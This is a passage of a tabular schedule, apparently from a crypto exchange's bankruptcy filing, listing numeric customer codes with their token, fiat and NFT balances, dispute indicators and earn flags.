| 07355296 | | BTC[.00021054], DOGE[75.55172064], USD[0.00] | | |
| 07355297 | | USD[10.00] | | |
| 07355298 | | DOGE[.13183219], SHIB[3], USD[0.00] | | |
| 07355299 | | USD[10.00] | | |
| 07355300 | | DOGE[1], USD[0.00] | | |
| 07355301 | | BTC[0], CUSDT[7], DOGE[6.91501295], SHIB[674805.68486292], SOL[0], TRX[2], USD[0.00] | Yes | |
| 07355302 | | BRZ[1], CUSDT[20.87517721], DOGE[37.26441461], ETH[.03142877], ETHW[.03142877], TRX[5.02507244], USD[0.10] | | |
| 07355303 | | BAT[1.0165555], BRZ[2], CUSDT[12], DOGE[7.20145043], ETH[.0000013], ETHW[.0000013], NFT (512608991379651409/Krishna)[1], NFT (520627262479128882/Solar Plexus Chakra - #3)[1], NFT (543849965536384016/Root Chakra - #1)[1], SUSHI[.00161158], TRX[5], USD[0.00] | Yes | |
| 07355304 | | BRZ[2], CUSDT[3], USD[0.00], USDT[2.22108539] | Yes | |
| 07355305 | | USD[10.00] | | |
| 07355306 | | BRZ[1], CUSDT[6], DOGE[5030.54050385], SHIB[4], TRX[4], USD[0.01] | Yes | |
| 07355307 | | ETH[.00403485], ETHW[.00403485], USD[0.00] | | |
| 07355308 | | BTC[0], ETH[4.31449817], ETHW[4.26734946], USD[17.25], USDT[0.00001141] | | |
| 07355309 | | USD[10.00] | | |
| 07355310 | | USD[10.00] | | |
| 07355311 | | USD[10.00] | | |
| 07355313 | | CUSDT[3], DOGE[152.28969998], USD[0.00] | | |
| 07355314 | | DOGE[152.49474542], USD[0.00] | Yes | |
| 07355315 | | DOGE[1], USD[31.37] | | |
| 07355316 | | BTC[.00016712], USD[0.00] | | |
| 07355320 | | USD[10.00] | | |
| 07355324 | | DOGE[536.98165887], SHIB[1877865.96721081], TRX[1], USD[0.01] | | |
| 07355325 | | USD[10.00] | | |
| 07355326 | | LTC[0], USD[0.00] | | |
| 07355327 | | USD[10.00] | | |
| 07355328 | | USD[10.00] | | |
| 07355329 | | BRZ[1], CUSDT[4], DOGE[0], TRX[1], USD[0.01] | | |
| 07355330 | | BTC[0], CUSDT[1], DOGE[0], SOL[0], TRX[0], USD[0.00] | | |
| 07355331 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], MATIC[0], SHIB[1], SOL[0.06817792], TRX[0], USD[1.84], USDT[0], YFI[0] | Yes | |
| 07355332 | | CUSDT[2], DOGE[.80680459], USD[0.74] | | |
| 07355333 | | USD[10.00] | | |
| 07355334 | | BTC[0], USD[0.01] | Yes | |
| 07355335 | | BRZ[1], CUSDT[2], DOGE[0], ETH[0], GRT[1], TRX[3], USD[0.00] | | |
| 07355338 | | USD[10.00] | | |
| 07355339 | | USD[10.00] | | |
| 07355340 | | BRZ[4], CUSDT[7], ETHW[.3329219], USD[0.00] | Yes | |
| 07355341 | | USD[0.00] | | |
| 07355342 | | USD[10.00] | | |
| 07355343 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00] | | |
| 07355344 | | USD[10.00] | | |
| 07355345 | | BAT[1.0165555], BRZ[3], CUSDT[12], DOGE[1], SOL[0], SUSHI[.2031789], TRX[4], USD[4.74], USDT[1.09557357] | Yes | |
| 07355346 | | CUSDT[1], DOGE[1], TRX[788.25719233], USD[0.00] | | |
| 07355347 | | USD[10.00] | | |
| 07355348 | | BAT[1.97012145], DOGE[0], USD[0.00] | Yes | |
| 07355349 | | USD[10.00] | | |
| 07355350 | | USD[10.00] | | |
| 07355351 | | USD[10.00] | | |
| 07355352 | | USD[10.00] | | |
| 07355353 | | USD[10.00] | | |
| 07355354 | | USD[10.00] | | |
| 07355355 | | USD[10.00] | | |
| 07355356 | | BAT[28.46676246], BF_POINT[200], BTC[.00933426], DOGE[184.41900639], ETH[.02054248], ETHW[.02028255], LINK[.3774126], NFT (486621395052348222/Entrance Voucher #3371)[1], SOL[.0838871], TRX[8], USD[462.40], USDT[0] | Yes | |
| 07355357 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355358 | | CAD[11.95], USD[0.00] | | |
| 07355359 | | BTC[0], DOGE[.00003058], SOL[.00029585], TRX[1.00002363], USD[0.04] | | |
| 07355360 | | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07355361 | | DOGE[134.23862069], USD[0.00] | | |
| 07355362 | | BAT[1], BRZ[4], CUSDT[14.02345198], DOGE[0], GRT[1], TRX[2], USD[0.00], USDT[2] | | |
| 07355363 | | DOGE[5957.87965567], SHIB[54624535.59250623], TRX[3648.12412283], USD[21.48] | Yes | |
| 07355364 | | BAT[1], BRZ[1], CUSDT[4], DOGE[739.3905687], ETH[.06518927], ETHW[.06518927], TRX[1], USD[0.01] | | |
| 07355365 | | USD[10.00] | | |
| 07355366 | | DOGE[129.70602647], USD[0.00] | | |
| 07355367 | | USD[10.00] | | |
| 07355368 | | USD[10.00] | | |
| 07355369 | | USD[19.64] | | |
| 07355370 | | USD[10.00] | | |
| 07355371 | | USD[10.00] | | |
| 07355372 | | USD[10.00] | | |
| 07355373 | | TRX[.00002578], USD[9.81] | Yes | |
| 07355374 | | CUSDT[1], DOGE[138.85288356], USD[0.00] | | |
| 07355375 | | USD[10.00] | | |
| 07355377 | | USD[10.00] | | |
| 07355378 | | TRX[1], USD[0.00] | | |
| 07355379 | | DOGE[1], USD[9.92] | | |
| 07355380 | | BAT[1.31703676], BRZ[1], DOGE[1], SHIB[10], USD[0.00] | Yes | |
| 07355381 | | LTC[.16888825], USD[0.00] | | |
| 07355382 | | BRZ[0.00301718], BTC[0.00026916], DOGE[2.12531342], USD[0.00] | Yes | |
| 07355383 | | USD[10.00] | | |
| 07355384 | | USD[10.00] | | |
| 07355385 | | BTC[0], CUSDT[2], DOGE[2], ETH[0], ETHW[0], LINK[0], SHIB[776295.47131054], TRX[0], USD[485.40] | Yes | |
| 07355386 | | BTC[0], CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07355387 | | CUSDT[20], DOGE[58.08029701], TRX[1], USD[0.00] | Yes | |
| 07355388 | | CUSDT[4], DOGE[1], TRX[3.00068699], USD[0.00] | Yes | |
| 07355389 | | USD[10.00] | | |
| 07355390 | | USD[10.00] | | |
| 07355391 | | CUSDT[4], USD[0.00] | | |
| 07355393 | | USD[10.00] | | |
| 07355394 | | USD[10.20] | Yes | |
| 07355395 | | DOGE[1], USD[0.00] | | |
| 07355397 | | USD[10.00] | | |
| 07355398 | | DOGE[1], USD[0.00] | Yes | |
| 07355399 | | USD[11.08] | Yes | |
| 07355400 | | CUSDT[11], DOGE[0], SHIB[0], TRX[2], USD[0.01] | | |
| 07355402 | | USD[10.00] | | |
| 07355403 | | USD[0.01] | | |
| 07355404 | | CUSDT[2], ETH[0], USD[0.01] | | |
| 07355405 | | USD[10.00] | | |
| 07355406 | | USD[0.00] | | |
| 07355407 | | USD[10.00] | | |
| 07355409 | | BRZ[1], DOGE[1], TRX[2], USD[0.91] | | |
| 07355410 | | DOGE[19.07017888], USD[0.00] | | |
| 07355411 | | USD[10.00] | | |
| 07355412 | | USD[10.00] | | |
| 07355413 | | ALGO[1232.52469382], BRZ[2], CUSDT[5], DOGE[1172.96533701], ETH[0.19516789], ETHW[0.19495429], GRT[1], SHIB[42592368.61897926], SOL[57.65732389], TRX[1], USD[0.00] | Yes | |
| 07355414 | | DOGE[25.99945005], USD[0.00] | | |
| 07355415 | | CUSDT[1], USD[0.01] | | |
| 07355416 | | USD[11.09] | Yes | |
| 07355417 | | USD[10.00] | | |
| 07355418 | | USD[10.00] | | |
| 07355419 | | USD[10.00] | | |
| 07355420 | | DOGE[0], TRX[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355421 | | USD[10.00] | | |
| 07355422 | | USD[10.00] | | |
| 07355423 | | BAT[68.3575269], CUSDT[2], TRX[2018.39745084], USD[0.01] | Yes | |
| 07355424 | | CUSDT[1], DOGE[57.51240241], SHIB[1405750.11551970], TRX[1340.94438734], USD[0.00] | Yes | |
| 07355425 | | USD[0.00] | | |
| 07355426 | | BAT[2], BTC[.00019372], CUSDT[3], DOGE[19330.36696804], SHIB[1732501.73250173], TRX[3], USD[0.00] | | |
| 07355427 | | USD[10.00] | | |
| 07355428 | | CUSDT[1], DOGE[.0000444], TRX[1], USD[0.00] | | |
| 07355429 | | USD[10.00] | | |
| 07355430 | | BAT[1.01655549], BRZ[2], CUSDT[12], DOGE[6697.29741558], TRX[52.22033978], USD[0.04] | Yes | |
| 07355431 | | USD[10.00] | | |
| 07355432 | | USD[0.01] | | |
| 07355433 | | ETH[.00533279], ETHW[.00533279], TRX[2], USD[0.00] | | |
| 07355434 | | DOGE[2645.40011254], USD[10.00] | | |
| 07355435 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07355436 | | USD[10.00] | | |
| 07355437 | | BTC[0], USD[0.00] | | |
| 07355438 | | BAT[.97650959], BRZ[1], CUSDT[2], DOGE[16147.73079831], TRX[3864.16356468], USD[3.06] | | |
| 07355439 | | BTC[.01934341], CUSDT[2], DOGE[5414.23884763], ETH[.01268172], ETHW[.01268172], TRX[1], USD[0.00] | | |
| 07355440 | | CUSDT[5], KSHIB[139.3225745], USD[0.00] | Yes | |
| 07355441 | | USD[10.00] | | |
| 07355442 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07355443 | | CUSDT[2], DOGE[1210.79229259], ETH[.00495866], ETHW[.00489771], NFT (39104686416673152/FTX - Off The Grid Miami #2687)[1], USD[0.00] | Yes | |
| 07355444 | | CUSDT[2], USD[0.00] | | |
| 07355445 | | CUSDT[4], USD[0.00] | | |
| 07355446 | | USD[10.00] | | |
| 07355448 | | CUSDT[17], DOGE[1], SOL[.31251803], TRX[1], USD[0.00] | Yes | |
| 07355449 | | USD[10.00] | | |
| 07355450 | | CUSDT[1], DOGE[.59251312], TRX[1], USD[0.01] | | |
| 07355451 | | USD[10.00] | | |
| 07355452 | | TRX[2], USD[5.20] | | |
| 07355453 | | BRZ[1], ETH[.3511144], ETHW[.3511144], GRT[1], TRX[1], USD[0.00], USDT[0.00000798] | | |
| 07355454 | | USD[10.00] | | |
| 07355455 | | CUSDT[1], USD[0.02] | | |
| 07355456 | | USD[10.00] | | |
| 07355457 | Contingent, Disputed | USD[0.00] | | |
| 07355458 | | USD[10.00] | | |
| 07355459 | | CUSDT[1], DOGE[.00008349], SHIB[1], TRX[2], USD[0.00] | | |
| 07355460 | | DOGE[23.01053343], USD[0.00] | | |
| 07355461 | | DOGE[1], USD[0.00] | | |
| 07355462 | | USD[10.00] | | |
| 07355463 | | USD[10.00] | | |
| 07355464 | | USD[10.00] | | |
| 07355467 | | USD[10.00] | | |
| 07355468 | | SHIB[1], USD[0.00] | | |
| 07355469 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07355470 | | BAT[4.37616622], BRZ[9.75127016], BTC[0], CUSDT[13], DOGE[6.11311832], ETH[0], GRT[8.49135066], LINK[2.1797045], MKR[.0000393], SUSHI[0.00983766], TRX[14.45790304], UNI[1.09404186], USD[0.00], USDT[0] | Yes | |
| 07355471 | | BRZ[3], BTC[.00121262], CUSDT[11], DOGE[.54895459], LINK[.01618641], TRX[3], USD[0.00] | | |
| 07355472 | | USD[10.00] | | |
| 07355473 | | NFT (394638032546342139/Saudi Arabia Ticket Stub #1339)[1], NFT (417978588266355665/Space Bums #7762)[1], NFT (536459856212928025/Grass Slime)[1], SHIB[0], USD[0.01], USDT[0] | Yes | |
| 07355474 | | USD[10.00] | | |
| 07355475 | | USD[10.00] | | |
| 07355476 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07355477 | | BRZ[20.52614887], CUSDT[111.37301456], DOGE[484.12703506], ETH[.03638194], ETHW[.03593017], SHIB[389501.02620283], USD[0.00] | Yes | |
| 07355479 | | CUSDT[1], DOGE[1273.99436175], TRX[1], USD[0.00] | Yes | |
| 07355480 | | BRZ[1], CUSDT[9], SOL[1.02444697], TRX[1], USD[0.00] | | |
| 07355481 | | USD[10.00] | | |
| 07355482 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355483 | | BRZ[1], CUSDT[19], DOGE[9588.34681706], ETH[.99449988], ETHW[.99407312], GRT[1.00498957], LTC[3.83506435], NFT (444176758545307341/Entrance Voucher #3869)[1], SHIB[1], SOL[2.29290749], TRX[3544.85280181], USD[7.511, USDT[0.88065517] | Yes | |
| 07355484 | | BAT[1], BRZ[1], CUSDT[6], DOGE[11292.11886541], GRT[1], TRX[6], USD[0.00] | | |
| 07355485 | | DOGE[139.98291368], USD[0.00] | | |
| 07355487 | | DOGE[69463.1489112], USD[2.34] | Yes | |
| 07355488 | | BTC[0], CUSDT[2], ETH[0], TRX[0], USD[0.00] | Yes | |
| 07355490 | | BAT[1], BRZ[2], DOGE[0], GRT[1], TRX[1], USD[4.99], USDT[3] | | |
| 07355491 | | BAT[4], BRZ[6], CUSDT[7], DOGE[6964.81156158], GRT[2], TRX[11], USD[0.00], USDT[1] | | |
| 07355493 | | BAT[2], BRZ[38.83814348], BTC[0], CUSDT[76.95897788], DOGE[34.18345226], GRT[8.20797614], MATIC[1.00764475], SHIB[48], SUSHI[1.04810209], TRX[90.1493796], USD[0.00], USDT[5.07801277] | Yes | |
| 07355494 | | USD[0.00] | | |
| 07355495 | | USD[10.00] | | |
| 07355497 | | BRZ[1], CUSDT[4], TRX[2], USD[0.53], USDT[1] | | |
| 07355498 | | DOGE[182.94164307], USD[0.00] | | |
| 07355499 | | USD[10.00] | | |
| 07355500 | | USD[10.00] | | |
| 07355501 | | BAT[1], BRZ[1], CUSDT[7], LTC[4.72969828], TRX[2], USD[0.00], USDT[2] | | |
| 07355502 | | BAT[1.0165555], BRZ[2], CUSDT[17], DOGE[1076.38264243], ETH[.04294953], ETHW[.04241601], SHIB[1825950.27815604], SOL[12.0102042], USD[0.07] | Yes | |
| 07355503 | | BAT[1], GRT[1], TRX[2], USD[0.00] | | |
| 07355505 | | USD[10.00] | | |
| 07355506 | | USD[10.00] | | |
| 07355507 | | USD[10.00] | | |
| 07355508 | | USD[10.00] | | |
| 07355509 | | BTC[0], CUSDT[3], DOGE[89.12994307], USD[0.36] | | |
| 07355510 | | USD[10.00] | | |
| 07355511 | | USD[10.00] | | |
| 07355512 | | BRZ[2], DOGE[1], USD[210.04] | | |
| 07355514 | | USD[10.00] | | |
| 07355515 | | BRZ[1], CUSDT[1], DOGE[4178.51550691], TRX[2], USD[8.00] | | |
| 07355516 | | CUSDT[2], TRX[2], USD[0.00] | | |
| 07355517 | | DOGE[.00007574], USD[0.00] | | |
| 07355519 | | CUSDT[1], USD[0.00] | | |
| 07355520 | | USD[10.00] | | |
| 07355521 | | DOGE[192.61298388], USD[0.00] | | |
| 07355522 | | USD[10.00] | | |
| 07355523 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], LINK[0], LTC[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07355524 | | USD[10.00] | | |
| 07355525 | | USD[0.00] | | |
| 07355526 | | USD[10.00] | | |
| 07355527 | | USD[0.00], USDT[0] | | |
| 07355528 | | BAT[1], BRZ[1], CUSDT[13], TRX[8], USD[29.25], USDT[1] | | |
| 07355529 | | DOGE[615.44193482], USD[221.13] | Yes | |
| 07355530 | | BTC[.00337301], CUSDT[4], ETH[.04495024], ETHW[.04438936], SHIB[4], SOL[.00095971], TRX[2], USD[366.23] | Yes | |
| 07355532 | | USD[10.00] | | |
| 07355534 | | BRZ[1], CUSDT[3], DOGE[1], ETH[0], ETHW[0], SOL[0], TRX[2], USD[0.01] | | |
| 07355535 | | BRZ[1], CUSDT[4], NFT (460566575152508914/Polka  Dino 3)[1], SHIB[1], USD[17.88], USDT[0] | Yes | |
| 07355536 | | DOGE[1.0000108], USD[0.01] | | |
| 07355538 | | USD[0.00] | | |
| 07355539 | | USD[0.13] | | |
| 07355541 | | DOGE[1], USD[0.01] | | |
| 07355542 | | GRT[4.79227654], USD[0.00] | Yes | |
| 07355543 | | BRZ[1], BTC[.0351471], CUSDT[10], DOGE[5331.59895519], ETH[.03013595], ETHW[.03013595], SHIB[947544.55337185], TRX[3], USD[0.01], USDT[1] | | |
| 07355544 | | BRZ[0], CUSDT[3], USD[0.00] | | |
| 07355545 | | CUSDT[6], DOGE[1], USD[0.00] | Yes | |
| 07355546 | | USD[10.00] | | |
| 07355547 | | USD[10.00] | | |
| 07355548 | | BTC[.00022369], USD[0.00] | Yes | |
| 07355549 | | USD[10.00] | | |
| 07355550 | | USD[10.00] | | |
| 07355551 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355552 | | CUSDT[2], DOGE[40.02638033], USD[0.00] | | |
| 07355553 | | USD[14.18] | | |
| 07355554 | | CUSDT[3], DOGE[1623.04128981], USD[0.00] | | |
| 07355555 | | USD[10.00] | | |
| 07355556 | | USD[0.00] | | |
| 07355557 | | BTC[0], CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07355558 | | BTC[0], DOGE[0], SHIB[2754744.76109257], TRX[1346.23932032], USD[0.00] | Yes | |
| 07355559 | | BAT[1], BRZ[4], BTC[.10910338], CUSDT[8], DOGE[1], GRT[2], SHIB[1], TRX[1.24177277], USD[0.01], USDT[0] | Yes | |
| 07355560 | | USD[10.00] | | |
| 07355561 | | USD[10.00] | | |
| 07355562 | | USD[10.00] | | |
| 07355563 | | GRT[0], LTC[0], USD[0.00] | | |
| 07355564 | | USD[10.00] | | |
| 07355565 | | CUSDT[1], TRX[1], USD[0.31] | | |
| 07355566 | | DOGE[663.07048508], USD[10.00] | | |
| 07355567 | | USD[10.00] | | |
| 07355568 | | USD[10.00] | | |
| 07355569 | | USD[10.00] | | |
| 07355570 | | CUSDT[1], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07355571 | | USD[10.00] | | |
| 07355572 | | BAT[2.12037801], CUSDT[1], DOGE[3.0000548], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07355573 | | USD[0.00], USDT[0] | | |
| 07355574 | | USD[0.01] | | |
| 07355575 | | USD[59.80] | | |
| 07355576 | | USD[9.72] | | |
| 07355577 | | USD[20.00] | | |
| 07355578 | | USD[10.00] | | |
| 07355579 | | USD[1.30] | | |
| 07355580 | | AAVE[1.36861224], ALGO[0], AVAX[4.17518513], BAT[217.16463366], BCH[.13522596], BF_POINT[100], BTC[.01401567], DOGE[4083.37815900], ETH[.209167], ETHW[.20894926], GRT[1093.76473078], LINK[3.54849329], LTC[.70644506], MATIC[378.94513189], NEAR[171.5922469], SHIB[22612328.43041150], SOL[4.57487645], SUSHI[55.54201710], TRX[0], UNI[8.35305505], USD[305.07], USDT[1.02303751], YFI[.00376728] | Yes | |
| 07355581 | | USD[10.00] | | |
| 07355582 | | DOGE[25.44293089], USD[0.00] | | |
| 07355583 | | CUSDT[1], DOGE[9438.26961948], ETH[.00621784], ETHW[.00621784], TRX[1], USD[0.00] | | |
| 07355584 | | USD[10.00] | | |
| 07355585 | | USD[10.00] | | |
| 07355587 | | DOGE[1000], USD[10.00] | | |
| 07355588 | | DOGE[1], USD[0.01] | | |
| 07355589 | | BRZ[1], BTC[.00056622], DOGE[359.82274596], TRX[2248.3904302], USD[0.00] | | |
| 07355590 | | BRZ[1], DAI[0], DOGE[37.58873438], ETH[0], ETHW[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07355591 | | BAT[2], BRZ[3], CUSDT[8], GRT[1], TRX[9], USD[0.01] | | |
| 07355592 | | DOGE[191.73179636], USD[0.01] | | |
| 07355593 | | USD[10.00] | | |
| 07355594 | | DOGE[147.51806026], USD[0.00] | | |
| 07355595 | | USD[10.00] | | |
| 07355596 | | USD[10.00] | | |
| 07355597 | | BCH[0], BTC[0], CAD[0.00], CUSDT[0], DOGE[0], ETH[0], EUR[0.00], LTC[0.13168905], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07355598 | | USD[10.00] | | |
| 07355599 | | BTC[.00096029], CUSDT[261.26729616], DOGE[289.15024702], ETH[.00235897], ETHW[.00233159], TRX[50.08972958], USD[28.83] | Yes | |
| 07355600 | | USD[10.00] | | |
| 07355601 | | USD[10.00] | | |
| 07355602 | | USD[10.00] | | |
| 07355603 | | USD[10.00] | | |
| 07355604 | | USD[10.00] | | |
| 07355605 | | BTC[0], TRX[1], USD[0.00] | | |
| 07355606 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07355607 | | BAT[.00062605], CUSDT[5], DOGE[3.00000305], USD[0.00] | Yes | |
| 07355608 | | BRZ[2], DOGE[1], USD[0.00] | Yes | |
| 07355609 | | DOGE[218.30953536], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355610 | | USD[0.00] | | |
| 07355611 | | USD[10.00] | | |
| 07355612 | | BRZ[1], CUSDT[9], TRX[4], USD[0.01], USDT[1] | | |
| 07355613 | | USD[10.00] | | |
| 07355614 | | DOGE[0], USD[0.00] | | |
| 07355615 | | DOGE[36.23112136], USD[0.00] | | |
| 07355616 | | USD[10.00] | | |
| 07355617 | | USD[10.00] | | |
| 07355618 | | USD[10.00] | | |
| 07355619 | | TRX[1], USD[0.00] | | |
| 07355620 | | USD[10.00] | | |
| 07355621 | | USD[10.00] | | |
| 07355622 | | CUSDT[10], USD[0.01], USDT[1] | | |
| 07355623 | | TRX[1.54619626], USD[0.00] | Yes | |
| 07355624 | | BAT[0], BRZ[2], CUSDT[2], DOGE[0], ETH[0], GRT[1], LINK[1], SOL[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07355625 | | USD[10.00] | | |
| 07355626 | | BTC[.01788366], DOGE[0.06492918], ETH[0], ETHW[0], KSHIB[1060.0970584], SHIB[3482848.16067176], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07355627 | | USD[10.00] | | |
| 07355628 | | USD[0.01] | | |
| 07355629 | | BRZ[0.00000001], BTC[0], ETH[0], USD[0.00] | | |
| 07355630 | | BRZ[3], CUSDT[23], USD[0.01], USDT[1.09589388] | Yes | |
| 07355631 | | BTC[0.03562108], DOGE[1719.75258321], ETH[0], ETHW[0], SHIB[0.00000001], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07355632 | | BTC[0], ETH[0], LTC[0], SHIB[1], USD[0.01], USDT[0] | | |
| 07355633 | | CUSDT[1], SHIB[1], TRX[362.55311635], USD[32.28] | | |
| 07355635 | Contingent, Disputed | CUSDT[10], TRX[3], USD[0.01] | | |
| 07355636 | | BTC[0], USD[0.00] | | |
| 07355637 | | BTC[.00041632], CUSDT[1], DOGE[783.99890145], USD[0.00] | | |
| 07355638 | | DOGE[1.00002336], USD[0.01] | | |
| 07355639 | | CUSDT[3], USD[0.00] | Yes | |
| 07355640 | | BRZ[4], BTC[.00000999], CUSDT[2.95986442], DOGE[.5132335], ETH[.00000933], ETHW[.00000933], TRX[10], USD[0.01], USDT[1] | | |
| 07355641 | | BAT[1.01588725], BRZ[2], CUSDT[6.52166782], DOGE[1555.85559114], SHIB[1], TRX[5.68895474], USD[130.74] | Yes | |
| 07355642 | | USD[10.00] | | |
| 07355643 | | USD[10.00] | | |
| 07355644 | | USD[10.00] | | |
| 07355645 | | USD[10.00] | | |
| 07355646 | | USD[10.00] | | |
| 07355648 | | CUSDT[1], DOGE[.0000035], ETH[0.00000874], ETHW[0.00000874], TRX[1], USD[0.01], USDT[1] | | |
| 07355649 | | USD[10.00] | | |
| 07355650 | | BTC[0.00136862], CUSDT[1], DOGE[354.67644977], TRX[3], USD[0.00] | | |
| 07355651 | | CUSDT[1], ETH[.00658251], ETHW[.00658251], TRX[2], USD[0.01] | | |
| 07355653 | | USD[0.01] | | |
| 07355654 | | DOGE[26.99263039], USD[0.00] | | |
| 07355655 | | DOGE[1128.64424758], ETH[.01123319], ETHW[.01123319], SGD[13.13], TRX[2], USD[0.00] | | |
| 07355656 | | USD[10.00] | | |
| 07355657 | | CUSDT[0], USD[0.00] | | |
| 07355658 | | USD[10.00] | | |
| 07355659 | | USD[10.00] | | |
| 07355660 | | USD[10.00] | | |
| 07355661 | | USD[0.00] | | |
| 07355662 | | USD[10.00] | | |
| 07355663 | | BRZ[0], BTC[0], DOGE[0], SUSHI[0], USD[0.00] | | |
| 07355664 | | CUSDT[1], DOGE[.00045773], USD[0.00] | | |
| 07355665 | | USD[10.00] | | |
| 07355666 | | USD[10.00] | | |
| 07355667 | | CUSDT[3], DOGE[2], SOL[.00000575], TRX[1], USD[0.00] | Yes | |
| 07355668 | | BRZ[0], BTC[.00109347], CUSDT[3], DOGE[704.81525581], LINK[2.67962149], TRX[2], USD[0.51] | | |
| 07355671 | | USD[10.00] | | |
| 07355672 | | CUSDT[8], DOGE[.00810018], ETH[0.00000058], ETHW[0.00000058], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355673 | | USD[10.00] | | |
| 07355674 | | USD[10.00] | | |
| 07355675 | | BAT[318.91816516], BRZ[1], BTC[0], CUSDT[4], DAI[0.06959971], DOGE[.26537906], ETH[0], ETHW[0], MATIC[.28938482], SOL[0.00314685], TRX[0.10964098], USD[-69.96], USDT[0.00000001] | Yes | |
| 07355676 | | USD[10.00] | | |
| 07355679 | | USD[10.00] | | |
| 07355680 | | CUSDT[12], SUSHI[.00002098], TRX[2], USD[34.21], USDT[0] | Yes | |
| 07355681 | | BRZ[3], CUSDT[3], DOGE[0], TRX[1], USD[0.01] | | |
| 07355682 | | TRX[1], USD[0.01] | | |
| 07355683 | | USD[10.00] | | |
| 07355684 | | BRZ[1], GRT[.00004052], SHIB[5], TRX[1], USD[71.83] | | |
| 07355685 | | BRZ[1], BTC[.04658579], CUSDT[2], DOGE[1], ETH[.62744992], ETHW[.62744992], TRX[3], USD[0.00], USDT[2] | | |
| 07355686 | | USD[10.00] | | |
| 07355687 | | DOGE[193.25281004], USD[0.00] | | |
| 07355688 | | BAT[0.24887584], USD[0.00] | Yes | |
| 07355689 | | BRZ[1], BTC[.02707128], CUSDT[1], SOL[1], TRX[1], USD[55.35], USDT[1] | | |
| 07355690 | | DOGE[1.63682598], TRX[1], USD[0.00] | | |
| 07355693 | | USD[10.00] | | |
| 07355694 | | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07355695 | | USD[10.00] | | |
| 07355696 | | CUSDT[1], DOGE[29.00483930], USD[0.00] | | |
| 07355697 | | USD[10.00] | | |
| 07355699 | | USD[0.00], USDT[0] | | |
| 07355700 | | BAT[1], CUSDT[1], TRX[3], USD[0.00] | | |
| 07355701 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07355702 | | USD[10.00] | | |
| 07355703 | | USD[10.00] | | |
| 07355704 | | DOGE[18035.02412817], USD[16.90] | Yes | |
| 07355705 | | USD[10.00] | | |
| 07355706 | | DOGE[136.76268501], USD[0.00] | | |
| 07355707 | | DOGE[72.32968324], USD[0.96] | | |
| 07355708 | | BTC[0], DAI[0], DOGE[2], GRT[0], USD[0.00] | | |
| 07355709 | | BRZ[1], DOGE[3460.66657255], USD[0.01] | Yes | |
| 07355710 | | USD[10.00] | | |
| 07355711 | | USD[10.00] | | |
| 07355712 | | USD[11.08] | Yes | |
| 07355713 | | USD[10.00] | | |
| 07355714 | | CUSDT[1], DOGE[8], GRT[0], TRX[0], USD[0.01] | | |
| 07355715 | | BRZ[1], BTC[0], CUSDT[2], DOGE[0], GRT[3], USD[0.00], USDT[1] | | |
| 07355716 | | USD[10.00] | | |
| 07355717 | | USD[10.00] | | |
| 07355718 | | DOGE[24.18259211], USD[0.00] | | |
| 07355719 | | USD[10.00] | | |
| 07355720 | | USD[10.00] | | |
| 07355722 | | BAT[2], BRZ[2], CUSDT[3], DOGE[132974.51073737], GRT[2], TRX[4], USD[0.34], USDT[1] | | |
| 07355723 | | USD[10.00] | | |
| 07355724 | | USD[10.00] | | |
| 07355725 | | DOGE[116.88550027], USD[10.07] | | |
| 07355726 | | USD[10.00] | | |
| 07355727 | | USD[10.00] | | |
| 07355728 | | USD[10.00] | | |
| 07355729 | | TRX[59.62830457], USD[0.00] | | |
| 07355730 | | CUSDT[2], DOGE[55.55733485], ETH[.00758401], ETHW[.00748825], GRT[10.64103152], SHIB[696242.62608582], TRX[67.99746486], USD[0.00] | Yes | |
| 07355731 | | DOGE[169.02975904], USD[0.00] | | |
| 07355732 | | USD[0.00] | | |
| 07355734 | | USD[10.00] | | |
| 07355735 | | USD[11.05] | Yes | |
| 07355736 | | USD[10.00] | | |
| 07355737 | | SHIB[233749.94928229], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07355738 | | USD[10.00] | | |
